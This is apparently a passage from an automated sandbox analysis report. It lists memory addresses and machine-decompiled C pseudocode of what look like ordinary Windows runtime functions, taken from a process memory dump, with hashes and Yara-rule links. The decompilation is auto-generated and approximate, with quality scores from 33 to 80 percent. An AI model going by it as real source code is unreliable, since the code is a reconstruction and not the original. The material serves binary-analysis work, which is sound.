                          0x048cf9f8
                          0x048cf9f0
                          0x04872e23
                          0x048cfa02
                          0x048cfa03
                          0x048cfa05
                          0x048cfa06
                          0x00000000
                          0x04872e29
                          0x04872e29
                          0x04872e2e
                          0x04872e34
                          0x04872e3e
                          0x00000000
                          0x00000000
                          0x04872e44
                          0x04872e47
                          0x04872e4d
                          0x00000000
                          0x00000000
                          0x04872e4f
                          0x04872e54
                          0x00000000
                          0x00000000
                          0x04872e5a
                          0x04872e5f
                          0x04872e9a
                          0x04872ea4
                          0x04872ea5
                          0x04872ea8
                          0x04872eaf
                          0x04872eb2
                          0x04872eb5
                          0x048cfae9
                          0x048cfaeb
                          0x048cfaed
                          0x048cfaef
                          0x048cfaf7
                          0x048cfaf8
                          0x048cfafd
                          0x048cfaff
                          0x048cfb04
                          0x048cfb04
                          0x048cfaff
                          0x04872ec0
                          0x04872ec4
                          0x04872ec6
                          0x04872ec8
                          0x048cfb14
                          0x048cfb18
                          0x048cfb1e
                          0x048cfb21
                          0x048cfb21
                          0x04872ece
                          0x04872ece
                          0x04872ece
                          0x04872ed7
                          0x04872e61
                          0x04872e63
                          0x048cfa6b
                          0x048cfa71
                          0x048cfa76
                          0x048cfa78
                          0x048cfa8a
                          0x048cfa7a
                          0x048cfa83
                          0x048cfa83
                          0x048cfa8f
                          0x048cfa91
                          0x048cfa97
                          0x048cfa9d
                          0x048cfaa4
                          0x048cfaaa
                          0x048cfaaf
                          0x048cfab1
                          0x048cfac3
                          0x048cfab3
                          0x048cfabc
                          0x048cfabc
                          0x048cfac8
                          0x048cfacb
                          0x048cfadf
                          0x048cfadf
                          0x048cfacb
                          0x048cfaa4
                          0x048cfa91
                          0x04872e6f
                          0x04872e6f
                          0x04872e5f
                          0x048cfa13
                          0x048cfa15
                          0x048cfa17
                          0x048cfa1f
                          0x048cfa21
                          0x048cfa22
                          0x048cfa25
                          0x048cfa28
                          0x048cfa2f
                          0x048cfa2f
                          0x048cfa2a
                          0x048cfa2a
                          0x048cfa2a
                          0x048cfa31
                          0x048cfa34
                          0x048cfa36
                          0x048cfa3c
                          0x048cfa3e
                          0x048cfa41
                          0x048cfa43
                          0x048cfa45
                          0x048cfa45
                          0x048cfa41
                          0x048cfa3c
                          0x048cfa4a
                          0x048cfa4f
                          0x048cfa51
                          0x048cfa53
                          0x048cfa56
                          0x048cfa5b
                          0x048cfa5e
                          0x00000000
                          0x048cfa5e
                          0x04872e23

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: RTL: Re-Waiting
                          • API String ID: 0-316354757
                          • Opcode ID: 89bda0a7e1743bee675bcdac93c15a1c87eb06ffefa3a813551efa05d2889850
                          • Instruction ID: f8c861349cef384f876128a873df056356a5cd4513f1d2d92fb71b59cb3ab1d5
                          • Opcode Fuzzy Hash: 89bda0a7e1743bee675bcdac93c15a1c87eb06ffefa3a813551efa05d2889850
                          • Instruction Fuzzy Hash: 9C610231A006489FEB21DF68C850B6EBBE6EB4572CF184FA9EA11D72C1D774F9408781
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04940EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                          Download Yara Rule
                          C-Code - Quality: 80%
                          			E04940EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0493FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04941074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E048B9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0493A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0493A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4968b04 >> 0x14) + (_v44 -  *0x4968b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04897D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0493138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04897D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0492FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4968724 & 0x00000008) != 0) {
						E049352F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E049415B5(0x4968ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                          0x04940eb7
                          0x04940eb9
                          0x04940ec0
                          0x04940ec2
                          0x04940ecd
                          0x0494105b
                          0x0494105b
                          0x04941061
                          0x04941066
                          0x04941066
                          0x0494106b
                          0x04941073
                          0x04941073
                          0x04940ed3
                          0x04940ed6
                          0x04940edc
                          0x04940ee0
                          0x04940ee7
                          0x04940ef0
                          0x04940ef5
                          0x04940efa
                          0x04940efc
                          0x04940efd
                          0x04940f03
                          0x04940f04
                          0x04940f06
                          0x04940f07
                          0x04940f09
                          0x04940f0e
                          0x04940f14
                          0x04940f23
                          0x04940f2d
                          0x04940f34
                          0x04940f34
                          0x04940f14
                          0x04940f52
                          0x00000000
                          0x00000000
                          0x04940f58
                          0x04940f73
                          0x04940f74
                          0x04940f79
                          0x04940f7d
                          0x04940f80
                          0x04940f86
                          0x04940fab
                          0x04940fb5
                          0x04940fc6
                          0x04940fd1
                          0x04940fe3
                          0x04940fd3
                          0x04940fdc
                          0x04940fdc
                          0x04940feb
                          0x04941009
                          0x04941009
                          0x04941015
                          0x04941027
                          0x04941017
                          0x04941020
                          0x04941020
                          0x0494102f
                          0x0494103c
                          0x0494103c
                          0x04941048
                          0x04941050
                          0x04941050
                          0x04941055
                          0x00000000
                          0x04941055
                          0x04940f88
                          0x04940f9e
                          0x04940fa2
                          0x04940fa9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04940fa9
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: `
                          • API String ID: 0-2679148245
                          • Opcode ID: 39985a077a2f629379cd53adb3f12d8f4d63d63510666c8614707845c3114752
                          • Instruction ID: 7ecb17923a1a6631ad8a92195f5e7241a3023580061b0334bc7955447d610497
                          • Opcode Fuzzy Hash: 39985a077a2f629379cd53adb3f12d8f4d63d63510666c8614707845c3114752
                          • Instruction Fuzzy Hash: 4C5189712083829FE324DE28D885F1BB7E9EBC4708F044A7DF99697290D671F845CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E048AF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04894120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E048B9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E048B9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E048B95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x691ea81a
							_t109 = L04894620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000691e
								E048BF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000691e
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E048B95D0();
										L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                          0x048af0d3
                          0x048af0d9
                          0x048af0e0
                          0x048af0e7
                          0x048af0f2
                          0x048af0f4
                          0x048af0f8
                          0x048af100
                          0x048af108
                          0x048af10d
                          0x048af115
                          0x048af116
                          0x048af11f
                          0x048af123
                          0x048af124
                          0x048af12c
                          0x048af130
                          0x048af134
                          0x048af13d
                          0x048af144
                          0x048af14b
                          0x048af152
                          0x048ebab0
                          0x048ebab0
                          0x048af158
                          0x048af158
                          0x048af15a
                          0x048af160
                          0x048af165
                          0x048af166
                          0x048af16f
                          0x048af173
                          0x048ebaa7
                          0x048ebaa7
                          0x048ebaab
                          0x00000000
                          0x048af179
                          0x048af179
                          0x048af18d
                          0x048af191
                          0x048ebaa2
                          0x00000000
                          0x048af197
                          0x048af19b
                          0x048af1a2
                          0x048af1a9
                          0x048af1af
                          0x048af1b2
                          0x048af1b6
                          0x048af1b9
                          0x048af1c0
                          0x048af1c4
                          0x048af1d8
                          0x048af1df
                          0x048af1e3
                          0x048af1e6
                          0x048af1eb
                          0x048af1ee
                          0x048af1f4
                          0x048af20f
                          0x048ebab7
                          0x048ebabb
                          0x048ebacc
                          0x048ebad1
                          0x048af215
                          0x048af218
                          0x048af226
                          0x048af22b
                          0x00000000
                          0x048af22b
                          0x048af1f6
                          0x048af1f6
                          0x048af1f9
                          0x048af1fb
                          0x048af1fb
                          0x048af1f4
                          0x048af191
                          0x048af173
                          0x048af152
                          0x048af203

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                          • Instruction ID: 6089d5f5bc15c9fc887b6cd1a027ea293e4873e424246b86a3390f5dd0ec499e
                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                          • Instruction Fuzzy Hash: 6B516A71604714AFD321DF19C840A6BBBE8FF48714F008A2AFA95C7690E7B4E954CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048F3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E048F3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x496d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E048B0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E048F3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E048BFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E048F3540;
						E048BFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E048CDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04900C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E048B97C0();
					}
					return E048BB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E048F3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E048F3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E048BFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E048B9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E048F3787(_a4,  &_v352, _t80);
						}
					}
					L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E048B95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                          0x048f3552
                          0x048f355a
                          0x048f355d
                          0x048f3566
                          0x048f3567
                          0x048f357e
                          0x048f358f
                          0x048f35a1
                          0x048f35a5
                          0x048f366b
                          0x048f366b
                          0x048f366d
                          0x048f3672
                          0x048f3679
                          0x048f3685
                          0x048f368d
                          0x048f369d
                          0x048f36a7
                          0x048f36b8
                          0x048f36c6
                          0x048f36c7
                          0x048f36dc
                          0x048f36e1
                          0x048f36e7
                          0x048f36e9
                          0x048f36e9
                          0x048f3703
                          0x048f3703
                          0x048f35b5
                          0x048f35c0
                          0x048f35c4
                          0x00000000
                          0x00000000
                          0x048f35ca
                          0x048f35d7
                          0x048f35e2
                          0x048f35e6
                          0x048f35e8
                          0x048f35f5
                          0x048f35fa
                          0x048f3603
                          0x048f3604
                          0x048f3609
                          0x048f360a
                          0x048f3612
                          0x048f3613
                          0x048f361e
                          0x048f3622
                          0x048f3628
                          0x048f362f
                          0x048f362f
                          0x048f3636
                          0x048f3638
                          0x048f363b
                          0x048f3642
                          0x048f3642
                          0x048f3636
                          0x048f3657
                          0x048f3657
                          0x048f365c
                          0x048f3662
                          0x048f3669
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: BinaryHash
                          • API String ID: 2994545307-2202222882
                          • Opcode ID: 08dffc869896e9f89135cc751b6c2c2ff35c8e01416b3e2f5cd844bdfba0ad09
                          • Instruction ID: f4fa2d30cfff7ff7873f642180463f12ab3d9437963277bc141a7e37954f75ce
                          • Opcode Fuzzy Hash: 08dffc869896e9f89135cc751b6c2c2ff35c8e01416b3e2f5cd844bdfba0ad09
                          • Instruction Fuzzy Hash: 544127F1D0052C9FEB219A54CC80FDEB77CAB45718F004AA5EB09E7240DB74AE888F95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048F3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E048F3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E048B9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04894620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E048B9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                          0x048f3893
                          0x048f3896
                          0x048f3899
                          0x048f389f
                          0x048f38a0
                          0x048f38a4
                          0x048f38a9
                          0x048f38ac
                          0x048f38ad
                          0x048f38ae
                          0x048f38af
                          0x048f38b1
                          0x048f38b4
                          0x048f38bb
                          0x048f38bc
                          0x048f38bd
                          0x048f38c4
                          0x048f38c8
                          0x048f38ca
                          0x048f38ca
                          0x048f38d5
                          0x048f393e
                          0x048f3940
                          0x048f3942
                          0x048f3952
                          0x048f3954
                          0x048f3961
                          0x048f3961
                          0x048f3967
                          0x048f396e
                          0x048f396e
                          0x048f3947
                          0x048f394c
                          0x00000000
                          0x048f394c
                          0x048f38ea
                          0x048f38ee
                          0x048f38f8
                          0x048f38f9
                          0x048f38ff
                          0x048f3900
                          0x048f3902
                          0x048f3903
                          0x048f390b
                          0x048f390f
                          0x048f3950
                          0x00000000
                          0x048f3950
                          0x048f3915
                          0x048f391d
                          0x048f391d
                          0x048f3922
                          0x048f3926
                          0x00000000
                          0x048f3928
                          0x048f392b
                          0x048f392b
                          0x048f3935
                          0x048f3937
                          0x048f3937
                          0x00000000
                          0x048f3935
                          0x048f3926
                          0x048f38f0
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: BinaryName
                          • API String ID: 2994545307-215506332
                          • Opcode ID: 1c8a7c6a8d591f6f53ce7b29d90462c08d094f882279e7dfd7059b577c839fae
                          • Instruction ID: f4ab26eff1f0ccac33f398e26a7318dd9dcc10d9d52ceaecd91c79760f6bce0c
                          • Opcode Fuzzy Hash: 1c8a7c6a8d591f6f53ce7b29d90462c08d094f882279e7dfd7059b577c839fae
                          • Instruction Fuzzy Hash: 77310872E00509AFEB16DA58CD45D7BB7B4EB42724F014A29EE14E7B50D730BE00CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                          Download Yara Rule
                          C-Code - Quality: 33%
                          			E048AD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x496d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04894120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E048BB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E048B98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E048B95D0();
					L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                          0x048ad29c
                          0x048ad2a6
                          0x048ad2b1
                          0x048ad2b5
                          0x048ad2b6
                          0x048ad2bc
                          0x048ad2bd
                          0x048ad2be
                          0x048ad2bf
                          0x048ad2c2
                          0x048ad2c4
                          0x048ad2cc
                          0x048ad384
                          0x048ad34b
                          0x048ad34f
                          0x048ad350
                          0x048ad351
                          0x048ad35c
                          0x048ad35c
                          0x048ad2d6
                          0x048ad2da
                          0x048ad2e1
                          0x048ad361
                          0x048ad369
                          0x048ad36d
                          0x048ad2e3
                          0x048ad2e3
                          0x048ad2e3
                          0x048ad2e5
                          0x048ad2ed
                          0x048ad2f5
                          0x048ad2fa
                          0x048ad302
                          0x048ad303
                          0x048ad30b
                          0x048ad30f
                          0x048ad313
                          0x048ad318
                          0x048ad31c
                          0x048ad320
                          0x048ad379
                          0x048ad37d
                          0x00000000
                          0x00000000
                          0x048eaffe
                          0x048eb001
                          0x048eb011
                          0x00000000
                          0x048ad322
                          0x048ad322
                          0x048ad330
                          0x048ad337
                          0x048ad35d
                          0x048ad339
                          0x048ad33f
                          0x048ad38c
                          0x048ad38c
                          0x048ad33f
                          0x048ad349
                          0x00000000
                          0x048ad349

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: ead456237254a8cf0c71604613c3071e163b96661bb49022ba6a360ea1997701
                          • Instruction ID: 0a648f074c2bac312eeb77d8e1bfec296de9bc24161c5f0cbc648e147ad03a80
                          • Opcode Fuzzy Hash: ead456237254a8cf0c71604613c3071e163b96661bb49022ba6a360ea1997701
                          • Instruction Fuzzy Hash: D83192B16083059FE710DF2CC98099BBBE9EB85658F000E2EF995C3610E678ED14DB93
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04881B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E04881B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E048BBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E048BA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E048BA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04894620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                          0x04881b8f
                          0x04881b9a
                          0x04881b9c
                          0x04881b9e
                          0x04881ba3
                          0x048d7010
                          0x048d7010
                          0x00000000
                          0x04881ba9
                          0x04881ba9
                          0x04881bae
                          0x00000000
                          0x04881bc5
                          0x04881bca
                          0x04881bcf
                          0x04881bd0
                          0x04881bd1
                          0x04881bd2
                          0x04881bd6
                          0x04881bdc
